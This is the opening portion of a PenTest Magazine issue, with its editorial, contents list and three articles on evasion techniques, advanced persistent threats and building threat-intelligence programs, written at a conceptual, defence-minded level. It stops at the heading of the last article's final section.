EDITORIAL TEAM
Managing Editor
Bartłomiej Adach
bartek.adach@pentestmag.com
Proofreaders & Betatesters
Lee McKenzie, Natalie Fahey, David Kosorok, Avi Benchimol, Tom Updegrove,
Bernhard Waldecker, Girshel Chokhonelidze, Hammad Arshed, Matthew Sabin,
Kevin Goosie, Ricardo Puga, Clancey McNeal, Ali Abdollahi, Craig Thornton.
Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their
assistance there would not be a PenTest Magazine.
Senior Consultant/Publisher
Paweł Marciniak
CEO
Joanna Kretowicz
joanna.kretowicz@pentestmag.com
DTP
Bartłomiej Adach
bartek.adach@pentestmag.com
COVER DESIGN
Hiep Nguyen Duc
PUBLISHER
Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Postępu 17D
Phone: 1 917 338 3631
www.pentestmag.com
All trademarks, trade names, or logos mentioned or used are the property of their respective owners.
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.
1
Dear PenTest Readers,
Another summer edition of our magazine is here, and it’s full of valuable infosec content. The two
opening articles are related to the topic of Advanced Persistent Threats. Professor John Walker starts
with presenting the interdependence of ATPs and Advanced Evasion Techniques (AET). In the article he
tries to answer the question why Persistent Threats and Evasions will not see any decline any time soon.
Mariana Peycheva, in turn, presents the analysis of Advanced Persistent Threats and its methodology,
giving a great overview the topic. As one of our reviewers said: “I wish that most of business leaders and
managers would read this”.
Chris Cochran wrote a very interesting piece, which can be considered as a guide for those building,
executing, or consuming threat intelligence. Abhi Singh is the author of a thought leadership article on
securing the API economy. It describes, at a high level, what kind of processes and architecture it would
take to make a secure and resilient API ecosystem. Pal Patel provides the readers with really interesting
case study on the usage of Right To Left Override technique. You should definitely check this article out
and find out more about this interesting trick!
Two of our regular contributors, Bohdan Ethics and Dinesh Sharma, provided new articles this month as
well. Bohdan brought to the table a presentation of antivirus evasion basics. Dinesh presents the
readers with different types of compliance audits, with a special angle on critical infrastructure. Ankit Giri
emphasizes the significance of mobile exploit applications in article, Vlad Martin points our attention to
the way in which black hats are collecting personal data in the Commonwealth of Independent State
member-countries, and, last but not least, David Evenden and Kent Potter present the Collegiate
Cybersecurity Education Program that they developed together.
Special thanks to all of the contributors, reviewers, and proofreaders involved in the process of creation
of this issue.
Without further ado,
Enjoy the content!
PenTest Magazine’s Editorial Team.
2
Contents
Long-Armed Persistence of Threats
Prof. John Walker
4
Advanced Persistent Threats – Silent But Smart
Mariana Peycheva
10
The Threat Intelligence EASY Button
Chris Cochran
17
Securing the API Economy
Abhi Singh
21
Right to Left Override (RTLO) Technique
Pal Patel
31
Antivirus Evasion Basics
Bohdan Ethics
35
Compliance Audit for Critical Infrastructure
Dinesh Sharma
55
The Significance of Mobile Exploit Applications
Ankit Giri
63
Black Hats: How They Are Collecting Personal Data in
the CIS Countries
Vlad Martin
69
How StandardUser Is Working with Practitioners and
Universities to Close the Talent Gap
Kent Potter and David Evenden
73
Long-Armed Persistence of Threats
Long-Armed Persistence of Threats
Professor John Walker
22 years in Royal Air Force Security/Investigations and Counter
Intelligence operations [Overt/Covert] service, working alongside GCHQ,
CESG, UK and US Agencies, ITSO and Systems Security Manager for
CIA Accredited Systems, Visiting Professor School of Science/
Technology - Nottingham Trent University [NTU], Advisory Board,
Research Centre in Cyber Security (KirCCS) at University of Kent,
Mentor to Tallinn University (Estonia) Masters Students Cyber
Research, Practicing and Registered Expert Witness, Certified Forensics
Investigator Practitioner [CFIP], Editorial Member at MedCrave
Research for Forensics & Criminology, ENISA CEI Listed Expert,
Editorial Member of the Cyber Security Research Institute [CRSI], Digital
Forensics/Cyber Security Listed Trainer at Meirc [Dubai] of Certified
courses, and Fellow of Royal Society for the Arts [FRSA], writer for
Apress Publishing New York, and a Belkasoft (Digital Forensics) Partner.
Time is now long past that dictates a fresh way of delivering agile cyber-defense is
now a must have, with the recognition that something, somewhere must change if
we are to win the cyber-security race. No matter what we deploy, and how we
operate those commercially procured systems and applications, one fact is certain –
we will encounter a Persistent Threat on an every-day basis in some form – it may be
a matter of such encountered threats are passive, awaiting their time to go
malevolent at their opportune moment; or, active and already on a mission to avoid
detection whilst delivering payload. It is now time to act, and look at Cyber-Security
in a new way, with joined up thinking, along with a recognition and guarantee that we
have been or will be breached.
Long-Armed Persistence of Threats
It was circa 2010/11 when I was approached by a Helsinki-based company – Stonesoft. Stonesoft wanted to
discuss a new angled threat vector which they referred to as the AET (Advanced Evasion Technique). I agreed
to meet with them at the InfoSecurity show of the day in London, and approached the conversation with more
than a little skepticism - could this be yet another InfoSec over-hyped terminology? Surrounded with the usual
InfoSecurity run-of-mill, mundane talk of the day, which in that year was PCI-DSS and, of course, Penetration
Testing, it would be at least refreshing to learn about something new. With doubt in my mind, the conversation
4
Long-Armed Persistence of Threats
progressed, and I was introduced to this new hypothesis of this AET thing. As the conversation proceeded with
my introduction to the AET, the theoretical value started to gain traction, and I found myself being pulled into
what I had considered a concept, toward the fact that it was possibly a new threat vector with significant
implications of insecurity.
The basics of the AET were to evolve and utilize evasion techniques as a means to disguise and/or modify
cyber-attacks through network connections, and to thus avoid detection by those deployed systems which
were supposedly delivering protection to the corporate valued assets. The objective here was, of course, to
achieve the successful delivery of hidden malicious content (payload), and the onward exploitation of a
vulnerable target host – here seeing Network Security Devices that are designed to conduct real-time, deeppacket inspection of the network traffic rendered potentially ineffective resulting in:
• Critical digital assets left unprotected
• A false sense of security born out of dependencies on supposed secure, up to date commercial network
defenses
• Organizations left not meeting their regulatory compliancy requirements
• A higher success rate of encountered network attacks
• A shift in the Threat Landscape supporting opportunities of high reward (financial, strategic, political or
technical) for the ‘advanced’ tech-savvy cyber-criminals
Given that at the time of the AET threat first being made public, the Verizon 2010 Business Data Breach
Investigations of the day Report stated that approximately 20% of incidents where malware had been
discovered had an unknown component for the infection vector – which moves us down the road of Zero Days,
a state which in 2019 has seen significant leap forward in growth, combined with an increase in cross-platform
threats - it may be thus reasonable to conclude that, what was seen as a new threat in 2010/11, is now a threat
vector with a close similarity to the Elephant in the Room!
The basis of the AET was simply to manipulate the IP Stack in such a way that the encountering IPS/IDS, or
firewalling technology would be confused by what its interface was seeing in the profile of a malformed stack,
and thus, in theory, would take one of, or a combination of, five actions:
1. Block
2. Allow
3. Alert
4. Write to the Log
5. Not write to the Log
5
Long-Armed Persistence of Threats
At the time of the AET being made public, there were 180+ stackable and combinable evasions being
researched in testing framework, meaning that these built up to a potential set of attack vectors, which were
concluded to be impossible to counter against all combinations without some form of an automated evasion
testing framework without which, vendors were denied the opportunities to develop adequate anti-evasion
capabilities and network defenses – a situation that gets worse when applied under IPv6, which offers a vastly
expanded combination of a malevolent cyber-universe, as described by Stonesoft’s Harri Haanpää as:
“Evasion techniques are a means to disguise and/or modify cyber-attacks to avoid detection and blocking by
information security systems. They typically make use of rarely used protocol properties in unusual
combinations and deliberate protocol violations. Such obfuscations may confuse the detection capabilities
of intrusion prevention/detection systems.”
At the time of the early work into the AET, Jack Walsh Program Manager (ICSA labs) concluded that “Advanced
Evasion Techniques can evade (and did) many network security systems. He went on to comment, we were
able to validate Stonesoft’s research and believe that these Advanced Evasion Techniques can result in lost
corporate assets with potentially serious consequences for breached organizations.” To add to the weight
behind, what was then, and to a large extent, and still is an ignored threat, Bob Walder, Research Director at
Gartner commented, “Recent research indicates that Advanced Evasion Techniques are real and credible – not
to mention growing – a growing threat against the network security infrastructure that protects governments,
commerce and information-sharing worldwide. Network security vendors need to devote the research and
resources to finding a solution.“ – and yet at that time, and even today, the threats are still largely ignored, or
should I say tolerated.
However, up to this point in time, I was only listening to the theoretical description of the threat of this new
‘AET’ conversation, but I was interested enough to agree to work alongside Stonesoft and visited their labs in
Helsinki to see the pragmatic side of the conversation. At the site within their lab conditions, the highly skilled
Stonesoft Team demonstrated testing against a variety of the latest release, up-to-date firewalling products for
their exposure to the AET threat, and the discoveries were astonishing, with results for all tested devices of:
• Bypass of the perimeter device to reach a supposedly protected asset
• Logs not being updated, or annotated with the wrong information
Upon returning from my visit, I was convinced that the new age AET threat was real and along with Stonesoft
wrote a paper on the subject. However, as one always encounters in the Cyber Security Industry, that paper
and the research of Stonesoft was challenged, with one of the most vocal being from McAfee who denounced
the research outright – interestingly enough, notwithstanding their public opinion on the AET, McAfee acquired
Stonesoft for $389 million in 2013 - I can only conclude that the paper and research they denounced must have
struck a note which enticed them to put their hands in their pockets of denial!
On the associated subject of the APT (Active Persistent Threat), we can see the emergence of the AET into a
new combined landscape of network dangers – dangers I have observed first hand inflicting breaches and
6
Long-Armed Persistence of Threats
compromises on the supposedly protected end-points, resulting in the bypass of firewalls, IDS, and IPS alike.
However, it is here where we start to see the strain of ignored system updates taking their toll. For example, the
continued use of out of patch operating systems, like seventeen year old Windows XP, which saw the massive
and successful WannaCry attack on the NHS, which cost the taxpayer £92 million, and resulted in the
cancellation of over 19,000 appointments – some of which had real-world, life inflicting consequences. It is also
still possible to see the old approach where Internal systems are not maintained with an adequate security
profile on the premise that they are hidden from the external interface that points to the dangerous outside
world, and thus are not accommodated by Anti Malware Protection, or as I encountered at an Oil and Gas
company any form of logging set against systems/folders storing critical data assets. In such cases as these,
the AET and the combination of the APT are ideal partners, with the AET serving up the means by which to
avoid detection and to deliver its payload (the APT), with the APT taking on the profile of, say, the Conficker
agent, which is a great little bit of malware to create a shell condition on its vulnerable targeted system – and
from there if the attacker is lucky enough, they will find other routine on-system tools such as the Windows
Management Instrumentation Command line (WMIC (wmic.exe)), which offers a multitude of intelligence
gathering and compromise opportunities - and then there is the much forgotten dangers from the world of DNS,
which can leave a great big black-hole open in the style of a Cuckoo’s Egg attack leveraging on a Zone Transfer
to quietly discover internal gems, which in one first-hand case concerning an East Midlands based Credit
Reference Agency, allowed the acquisition of a script containing a hard coded User ID and the associated
Password – and then of course onward potentials for compromise!
wmic.exe
7
Long-Armed Persistence of Threats
Having started off circa 2010, we now move into the year 2019 in which we still see the risks and attack vectors
of the AET and APT at an all-time-high, and this against a backdrop of a higher than ever spend on security,
alongside the associated growth of complexities of a cyber-dependent, always connected business and social
society – a world, according to McAfee some years back, in which they were winning the Cyber-Security Race
– I think not! The time is here where we need to ask the right questions about our level of deployed defenses,
starting with those shown in the below image:
Do evasions pose a threat to us (or not)?
1. Security Level Evaluation/audits of existing
security devices
2. New Product Evaluation for investment
decisions
Have we evaluated security risks correctly, and
are we managing these risks?
Which product offers highest protection against
evasions?
How can I verify vendor claims?
Is our security level high enough?
3. Redesigning network security
Where to place or relocate IPS/deep packet
inspection devices? And what kind?
So, where are we today? Evidenced by the long list of breached and compromised originations who have
invested small fortunes and placed their ultimate trust in commercial devices and staff to defend their
technology-kingdoms, one may only conclude that the case to argue that Persistent Threats and Evasions are
not seeing any demise soon, and the question must be asked what is going wrong? Is it that:
• The reliance on the over-priced commercial promise, Silver Bullet security device, with over-expectation of the
actual capabilities to defend the network is flawed?
• We have gone down the long-path of Tick-Box Compliance led security approach so far, we have parted
company with the bit-and-bobs of technical security skills?
• The Skills Gap issue in the Cyber Space is now hitting its mark with an adverse effect?
• Under-maintained, over exposed assets residing on the network adds to the conundrum of insecurity?
8
Long-Armed Persistence of Threats
• Or finally, as with the combination of an AET with the APT, is it that the aforementioned all have their own part
to play in a world that will assure the Persistent Threats will continue to evolve and bite!
Looking back over the years from 2010 right up to 2019, what is so very interesting is that the only thing that
has changed is that the situation of insecurity has become far worse in a world in which Persistent Threats are
ever present, and being leveraged by a range of adversarial actors, from those with quick-win monetary gain in
mind, to the state-sponsored activities of the geopolitical aggressors, not to mention the groups of
commercially motivated serious and organized crime gangs. Thus, time is now long past that dictates a fresh
way of delivering agile cyber-defense is now a must have, with the recognition that something, somewhere
must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those
commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on
an every-day basis in some form – it may be a matter of such encountered threats are passive, awaiting their
time to go malevolent at their opportune moment; or, active and already on a mission to avoid detection whilst
delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined up thinking, along
with a recognition and guarantee that we have been or will be breached. We must start to evolve the mindset of
deployed states of readiness that are associated with the recognition that the proactive defenses may be (are)
flawed, and take up a robust posture on the reactive side of ‘Response’ to underpin structured engagements
and recovery from the most adverse of anticipated known-unknown conditions of the Persistent Threat. Above
all, we must deploy our infrastructures from the ground up in a well formed, well documented and potentially
segmented way to take into account that the Persistent Threats will be seeking to leverage and exploit any one
of many combinations of exposure opportunities to deliver their show-stopping payload!
9
Advanced Persistent Threats – Silent But Smart
Advanced Persistent Threats – Silent But
Smart
Mariana Peycheva
Mariana Peycheva is CSO for the Unified
Communications and Collaboration division
of Atos.
According to a study by ISACA, phishing is the most common way for lunching APT
as it gives the attacker an opportunity to gain initial access to the organization, and
considering the human factor as one of the biggest vulnerabilities, makes the
defense mechanism against initial attacks very difficult for design. It was evident
from the study that 53.4% of the people believe APT is not much different from
traditional attacking methods. However, 93.9% of the people agreed that APTs poses
a significant threat to national security and economic stability. Among the critical
findings in this survey paper are that 63% of the people believe that it’s just a matter
of time before their organization becomes a victim of an APT attack, while only 60%
believe that they are capable enough to stop such an attack.
Introduction
The term Advanced Persistent Threats, or ATP, featured in the general terminology of the information security
profession in mid-January 2010 when Google announced that its intellectual property was a victim of a targeted
attack originating in China. Google is not the only one; more than 30 other technology companies, military
contractors and large enterprises have been hacked by hackers who used a suite of social engineering,
targeted malware, and surveillance technologies to secretly gain access to piles of sensitive corporate data [1].
10
Advanced Persistent Threats – Silent But Smart
Google's public recognition has raised the issue of targeted long-term attacks by well-prepared attackers
seeking access to corporate property and military information. It also launched a series of vendors promoting
promising anti-APT products and services that only obscure the issue for security managers and activity
managers [1].
The US Air Force built the phrase Advanced Persistent Threats in 2006, as their teams needed to communicate
with partners in the unclassified public administration world. People from the Department of Defense usually
give classified names of specific threats and attackers and use them to describe the activities of participants in
those threats. If the Air Force wants to talk about some intrusion with other personnel, they would not be able
to use the classified name of the actor in the threat. Therefore, they built the term APT as an unclassified
nickname [1]. At early stages, such attacks were dedicated to government or financial organizations, but now
the domain is much larger.
APTs target specific actors in the threats; APTs do not refer to vague and shady internet powers. The term is
most commonly applied to various groups operating in the Asia-Pacific region. Those who are familiar with APT
activities may have an honest dispute about whether the term should be used to refer only to some participants
in the Asia Pacific region [1] or whether it can be expanded as a general classifier. In other words, if criminals
from Eastern Europe work using the same tools, tactics, and procedures as traditional APTs, will these actors
also bear the APT label?
The answer to this question depends on the person asking it. An IT security specialist in a private organization
will usually not be interested in whether the participants in the threat attacking the company are from Asia and
the Pacific or Eastern Europe. The reason they perform the same defensive actions, regardless of the location
or nationality of the opponent. However, anyone with legal and/or national security responsibility who
implements diplomatic, intelligence, military or economic measures will undoubtedly want to determine the
origin of an attack [1].
Long-time there was not a clear understating of what ATP is. Several factors contributed to the overall sense of
confusion:
• With no details to discuss, the security community turned to just about anyone ready to talk about the
incident. In too many cases, speakers have turned out to be providers who saw APT as a marketing
opportunity to recover fast-falling security costs [1].
• Many analysts are strictly focused on the elements of the incident that they understand best, irrespective of
the true nature of the event [1]. Companies that specialize in botnet research assume that botnets were
involved, others focused on vulnerability identification and breach development. Unfortunately, botnets have
nothing to do with APT, and vulnerabilities, breaches, and malware are just elements of APT incidents, not
their core functions.
• Impact of APT - Economic advantages, strategic benefits, stealing sensitive information, so the goals can be
political such as undermining internal stability or economic goals based on the theft of victims' intellectual
11
Advanced Persistent Threats – Silent But Smart
property. Logically there are technical objectives that extend the ability to complete the mission. These
include gaining access to source code to develop breaks further or to study the work of security to conquer
better or break it. The most worrying thing is that attackers can make changes to improve their positions and
weaken the victim [1].
Analysts rate APT activities as having four main goals and describe the enemy as follows:
Advanced means that opponents can act across the spectrum of a computer attack. They can use the most
trivial, easily accessible breakthroughs against well-known vulnerabilities, or elevate their game to exploring
new vulnerabilities and develop specific breakthrough methods that depend on the situation of the target.
Persistent means that the enemy has the specific task of completing his mission. These are not casual
attackers. They receive directives from their bosses in the same way as an intelligence group. Being
persistent does not necessarily mean that they are continually executing malicious code on victims'
computers [1]. Instead, they maintain a certain level of engagement necessary to fulfill their purpose.
The threat means that the opponent is not a piece of meaningless code. It is a threat that is organized,
funded, and motivated. Some people talk about many "groups" consisting of specialized "crews" with a
variety of missions [1].
The traditional attack is usually performed by one person, aggressive, very rapid, smash and grab, tactic based
on a minimal time-based attack, but ATP is repeated attempts using several methods, stealth approach, adapts
to resist defenses, very slow to avoid any suspicions may involve sleep modes before commencing any attack
[2].
As it was already mentioned, there are cyber espionage groups associated with various ATP attacks.
In 2018, TrendMicro security researchers reported an attack using Android malware matching Bahamut’s code
(Mobile Device Management (MDM) tool detected in a campaign targeting iPhone devices in India), but which
connects to its command and control (C&C) infrastructure.
Some of these C&C’s, which also act as phishing sites, attempt to lure users into downloading malicious
applications via links to Google Play. Such kind of applications and codes can retrieve network information and
the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with
specific extensions, even steal screenshots of messages.
In short, APT is an adversary who performs bold operations (called networked computer operations) to maintain
information about the status of their goals.
APT is characterized by its persistence in maintaining some degree of control over the target's computer
infrastructure, acting continuously to preserve or restore control and access. At informal counterintelligence and
the military meetings, their analysts use the term "aggressive" to emphasize the extent to which APT pursues
its goals against the various governmental, military, and private targets.
12
Advanced Persistent Threats – Silent But Smart
Let’s take a deeper look on the ATP methodology:
The ATP attack is based on four of five stages, but generally, it can be summarized as breaking in, scanning
the network, identifying the target, making it accessible to accomplish the goal, and escaping the network
without leaving any trace or evidence [2].
1. At stage one, the attacker can use different techniques like social engineering, open-source intelligence tools
(OSINT) or approaching an organization which sells data or information about multinational firms. This step
aims to know the target and gather as much information as possible about it.
As there are countless ways to conduct the initial step of infiltrating, defining a security baseline or a model to
stop the initial attack is quite a challenge. Having in mind the persistent approach in APT, it is only a matter of
time for an attacker to find a backdoor in security mechanism [2].
2. At stage two – breaking in. We can expect that the attacker will exploit the weakness and gain access to the
target network. They can use an indirect approach technique such as spear phishing, watering hole attack, or
zero-day virus to infiltrate and deploy any remote access tool for further activities.
A common approach is the use of email combined with social engineering – a targeted user received a link in
an email from a reliable person or source bringing the user to a linked website which contains a malicious
JavaScript payload, browser downloads, and executes it. They can simply send an attachment in the email
presuming from a reliable source, or just through an infected USB, which attached to a window-based system,
will auto-execute a malware without user interaction utilizing zero-day vulnerability.
A different approach, defined as direct, is easy for understanding – the attacker can compromise any third party
working at the organization and use the privilege to gain access to any system or server [2].
Identifying target – as the definition suggests, in this stage, the attacker searches and identifies the target
data. The chances of being caught are quite high, as the attacker will be scanning the network for its target and
this could result in abnormal traffic behavior or trespassing of data files or access violations on the network [2].
If the attacker succeeds to identify the targets, they have to make it accessible or acquire the appropriate rights
to access that data. Rootkits can also be secretly installed on targeted systems and network access points to
monitor or capture data and commands as they stream over the network. The captured information can be
utilized to give invaders the information they need to plan future attacks or to make target data accessible. At
this stage, being persistent is a key feature for stealing the information [2].
Fleeing the network - Finally, the hacker will try to escape and cover the tracks, so that it becomes more
challenging to identify the attacker and to detect the damage done. In some cases, the attacker uses APT to
gain long-term access or to drop a back door so that the network can be accessed whenever required [2].
APT is an approach based on phases. Usually, 3 to 4 stages and most of the organizations are not even aware
that an APT attack happened on their network [2].
13
Advanced Persistent Threats – Silent But Smart
How to protect from ATP?
This is not a simple attack, but logically designed and composed of numerous hacking tools and processes
following a sophisticated pattern to achieve its objective. The victim is “inspected” constantly over a long
period. The attackers are not “Script Kiddies” but possess a high level of knowledge and plenty of resources so
we should not expect a simple solution. Many of the “classic” security tools are unable to manage this
purposeful and previously considered attack. For example, when using software that may be untrustworthy, it
is essential to use it in a sandboxed area so that other software, files, and applications are not compromised
[3]. If no adverse actions are detected after a while, then it is assumed that the code is safe, and it is allowed to
execute. But the malware developers are smart, and they can bypass this detection technique by having their
code sit dormant for days or even weeks before activating and wreaking havoc.
To react to this threat first, we shall discover and analyze it.
The network traffic analysis, which follows the traffic and applications, is one of the needed components in the
layered designed defense. Ideally, there will be an engine that identifies malware and activities signaling an
attempted attack. A detection intelligence can aid your rapid response.
Email security is a highly escalated topic nowadays. Different advanced malware detection techniques identify
and block the spear-phishing emails. As we discovered from an example structure of the attack, the phishing is
the initial phase of most targeted attacks. They can discover malicious content, attachments, and URL links
that pass unnoticed through standard email security.
Endpoint security - Monitoring that records and reports detailed system activities to allow threat analysts to
assess the nature and extent of an attack rapidly. It is also a mandatory part of a sophisticated defense
technique. Most forms of malware and advanced persistent threats enter the enterprise through vulnerable
endpoints [4].
To detect malware based on file signatures or blacklisting seemed to be very inefficient techniques in the fight
with ATP.
Following the customer needs, the security vendors have started to take radically new approaches to
combating malware and APTs.
For example, Trend Micro Deep Discovery solutions for network, email, endpoint, and integrated protection
provide advanced threat protection [5]. It was designed as a management solution that helps large enterprise
and government organizations. It provides network-wide visibility, a significant control needed in this kind of
protection, detection engines focus on identifying advanced malware and human attacker and a real-time
dashboard presenting the in-depth analysis and actionable intelligence required to prevent, discover, and
contain attacks against corporate data alongside with a console providing real-time threat visibility and detailed
scrutiny in an intuitive multi-level format. Thereafter, the security professionals can focus on risks, deep forensic
analysis, and rapidly implement containment and remediation procedures [6].
14
Advanced Persistent Threats – Silent But Smart
Untestable Trend Micro, and not the only vendor, focus their attention to APT. McAfee claims that their
Advanced Threat Defense combines in-depth static code analysis, dynamic analysis (malware sandboxing), and
machine learning to increase zero-day threat detection, including threats that use evasion techniques and
ransomware which allows us to uncover hidden risks. Alongside the threat intelligence sharing option, which
makes possible the immediate sharing of threat intelligence across the entire infrastructure, the solution
supports offline analysis options, and advanced features enable security operations centers to validate threats.
The centralized analysis covers multiple protocols and recommended products, including email gateways.
Surely going through different vendors will we find that most of them provide sophisticated solutions which can
support the security professionals in their efforts against APT.
To conclude, an APT is a layered attack. Therefore, the defense should be designed on layers too. Starting with
phishing campaigns, whose aim is not to “catch” the unprepared employee but to give us a clear
understanding of how vulnerable is the human factor in the organization. There should be procedures and
policies that implement regular and mandatory training for employees – how to recognize the phishing, how to
report it and protect themselves and the enterprise. The security professionals should never forget that the
employees are the first level of defense. Other policies can forbid any server outside of the company premises
to send emails from the organization’s domain, combined with operational security on the email gateway. Other
functional security techniques shall be implemented regularly on the mail gateway level, and there are many
good alternates already offered from the vendors.
Good security protection on host level plus tools can be used by security teams to monitor the end system
behavior offline or even better to integrate an automated intelligence.
As discussed, the network security techniques shall be armed with tools for network traffic analyses which
recognize malicious behavior.
And finally, the organization shall invest in good security professionals, different security knowledge among the
different teams is needed. The leads should understand well that the investment in their employees, continuous
education and clarification, and better knowledge is mandatory.
According to a study by ISACA, phishing is the most common way for lunching APT as it gives the attacker an
opportunity to gain initial access to the organization, and considering the human factor as one of the biggest
vulnerabilities, makes the defense mechanism against initial attacks very difficult for design. It was evident from
the study that 53.4% of the people believe APT is not much different from traditional attacking methods.
However, 93.9% of the people agreed that APTs poses a significant threat to national security and economic
stability. Among the critical findings in this survey paper are that 63% of the people believe that it’s just a matter
of time before their organization becomes a victim of an APT attack, while only 60% believe that they are
capable enough to stop such an attack [2].
The most effective fight against APT is having trained and knowledgeable information security analysts. Many
security providers have adopted APT in their advertising cast. Some offer the opportunity to detect APT in the
15
Advanced Persistent Threats – Silent But Smart
potential victim's networks. Another has even registered APT domain names. Tools are always helpful, but the
best advice I can provide is to educate business leaders about threats so that they support organizational
security programs drawn up by competent and knowledgeable employees [1].
An APT can be considered as one of the most threatening security concerns. As the world advances towards
IoT (Internet of things), certain measures need to be taken so that APT attacks can be handled with ease [2].
At a technical level, building visibility will provide the organization with an awareness of the situation and a
chance to detect and thwart APT activity. Without information from the network, hosts, logs, and other sources,
even the most skilled analyst is rendered helpless. Fortunately, obtaining such information is not a new
challenge, and most security departments are already using such programs [1].
The purpose of combating ATP operations should be to make it as difficult as possible for an adversary trying
to steal intellectual property, or as some say, to increase its price per megabyte.
References:
1. https://searchsecurity.techtarget.com/magazineContent/Understanding-the-advanced-persistentthreat
2. https://pdfs.semanticscholar.org/c6c3/06e7e4253885bd2d0ed25b8f2524fbbb2a92.pdf
3. https://www.techopedia.com/definition/25266/sandboxing
4. https://www.networkworld.com/category/advanced-persistent-threats/?start=20
5. https://interwork.com/wp-content/uploads/2016/12/sb01_dd_overview_140526us.pdf
6. https://www.helpnetsecurity.com/2012/03/01/trend-micro-unveils-apt-management-solution/
16
The Threat Intelligence EASY Button
The Threat Intelligence EASY Button
Chris Cochran
Chris Cochran is former active duty US Marine Intelligence. Chris has
dedicated his career to building advanced cybersecurity and
intelligence capabilities for national-level governments and the private
sector. He has led intelligence programs at the National Security
Agency, US Cyber Command, US House of Representatives, financial,
and high-tech sector companies. He currently leads the threat
intelligence and operations program at Netflix. Chris has made it his
personal mission to motivate and empower cybersecurity professionals
and teams through coaching, his podcast, and speaking engagements.
His concern for the ever-growing cyber skill gap serves as a motivator
for his need to inspire the next generation of cyber warriors to take the
helm.
Requirements are the foundation of an intelligence program. I have been a part of
teams where this was not done. We would project our own thoughts and biases into
our support of other teams without gathering the stakeholder’s thoughts or
concerns. As you read this, I am sure you see how big of a misstep this is. However,
this is not likely an isolated incident. In fact, many of the teams I have coached
missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the
calendar and schedule meetings with your stakeholders. During the meeting, be
present and listen more than you speak. Write down possible requirements and ask
validation questions. You will then be on your way to building an effective program.
Introduction
We have all seen it. Ineffective threat intelligence is happening across the globe. There are teams writing
resource intensive weekly products that many will not read. There are companies buying intelligence feeds that
will not be operationalized. There are intelligence teams that are not aligned to their stakeholders and there is
not a process to gather that feedback to make course corrections. This article is not an attempt to belittle the
efforts of budding intelligence teams. This article aspires to be a guide for those building, executing, or
consuming threat intelligence.
17
The Threat Intelligence EASY Button
The more I grow in my career, the more I look to give back to the professionals making their way through the
cybersecurity landscape. I found myself answering the same messages and questions about threat intelligence.
One day I thought to myself, “Wouldn’t it be great to have a threat intelligence EASY button that people could
press to help guide them through this process?” I have spent my career coaching intelligence analysts and
teams and 85% of that advice can be boiled to four simple, but sometimes difficult, concepts that serve as a
touchstone for intelligence leaders and practitioners. These concepts are:
• Elicit Requirements
• Assess Collection Plan
• Strive for Impact
• Yield to Feedback
There you have it, the Intelligence EASY Button. These concepts are what I have always done and with a dab of
creativity, I was able to distill my philosophy into digestible nuggets.
Let's take some time to look at each of these individually.
Elicit Requirements
"It's not me, it's you." - Lily Allen
If you have been following my LinkedIn for a while or listen to my podcast, I have foot-stomped this concept on
many occasions. Threat intelligence teams, companies, experts are in the "service" business. We support
OTHER functions. While I do believe threat intelligence leads security, our work is not about us, it is about our
stakeholders. We need to know what information they require that will make their jobs more efficient, more
effective, or change what they are doing entirely. You will encounter some stakeholders that do not know what
information will aid those objectives. These are some of my favorite situations. You can have an "aha" moment
right there with your stakeholders. Ask questions. Ask good questions. Practice asking questions and refine
your stakeholder analysis. You will find, the more polished the requirements, the easier it is to support your
stakeholders.
You will want to do the best you can to get this right. Requirements are the foundation of an intelligence
program. I have been a part of teams where this was not done. We would project our own thoughts and biases
into our support of other teams without gathering the stakeholder’s thoughts or concerns. As you read this, I
am sure you see how big of a misstep this is. However, this is not likely an isolated incident. In fact, many of the
teams I have coached missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the
calendar and schedule meetings with your stakeholders. During the meeting, be present and listen more than
you speak. Write down possible requirements and ask validation questions. You will then be on your way to
building an effective program.
Assess Collection Plan
"Everybody has plans, until they get hit." - Mike Tyson
If you are starting a threat intelligence program and you have a fleshed out collection plan before you did your
first stakeholder interview, I assess with HIGH confidence you will have to go back to the drawing board. Even
18
The Threat Intelligence EASY Button
after you have done stakeholder analysis and there are new requirements that come up, you will have to look at
what information you are currently using for your analysis. Ask yourself, "Is this feed answering the questions
my stakeholders have?" Every feed is not for every team. A great source may not have the answers you are
looking for. Constantly reassess your collection plan and be aggressive in trimming away the non-essential.
When your requirements change, do some due diligence and make sure you can support given your current
collection posture.
Threat feeds are not silver bullets for intelligence. Threat feeds can be an incredible force-multiplier or a waste
of funds. Efforts must be made to ensure you are using the vendors and feeds you pay for. Look at efficient
ways to enrich your incident response using this data. Use your feed to reach quick determinations on the
reputation of indicators. Distill TTPs into digestible data points for your detection and threat hunting
capabilities. Optimize your resources and squeeze all of the functionality out of your feeds. Once you have
practice at this, it will be easier to do the same for other solutions.
Strive for Impact
What you do has far greater impact than what you say.” - Stephen Covey
Let me paint a picture. You have spent the last two months working on a report you believe will change the
game at your company. You were diligent in your analysis. You included the best research from world-renowned
experts. You polished it up real nice with the help of a couple editors. You even had marketing take a stab at
making graphics for you. You deliver your masterpiece and... crickets. You wait a few days and ask, "Hey, what
was the reception of the report?" Your boss replies, "It was great work! Everyone loved it. The only problem is
they didn't understand the 'So what?'" Ouch... I have been there and I am sure many of you have been there
too. The beauty of threat intelligence or intelligence in general is it has the ability, and often goal, of inciting
change. The work I do can literally change the way my company operates, if I strive for impact in my
intelligence analysis and reporting. Take some time and think about what information is going to who, in what
context, and to support what decision, every time you hit send on that email.
Let me let you in on a little secret. In my current role, I am cheating. I am responsible for threat intelligence and
production, but I also lead threat operations AKA our purple team. There are many definitions of a purple team.
The way we look at it:
• Threat intelligence sets the threat context
• The red team emulates that threat in conjunction with risk priorities set by the organization
• The blue team, or threat hunters, are trying to find all of the malicious activity your security appliances are not,
including the red team
• Ultimately, you want to automate a successful hunt and add to your detections
This process is incredibly powerful. You iteratively close gaps in the organization's security posture. I know
what you must be thinking, “Chris, we do not have dedicated red teamers or threat hunters.” Neither do we at
my current role. We have implemented a reservist model that allows people to step into those roles periodically
so we can execute the mission without hiring dedicated teams. This reiterates the concept of optimizing what
you have access to, including people.
19
The Threat Intelligence EASY Button
Yield to Feedback
“Feedback is the breakfast of champions.” - Ken Blanchard
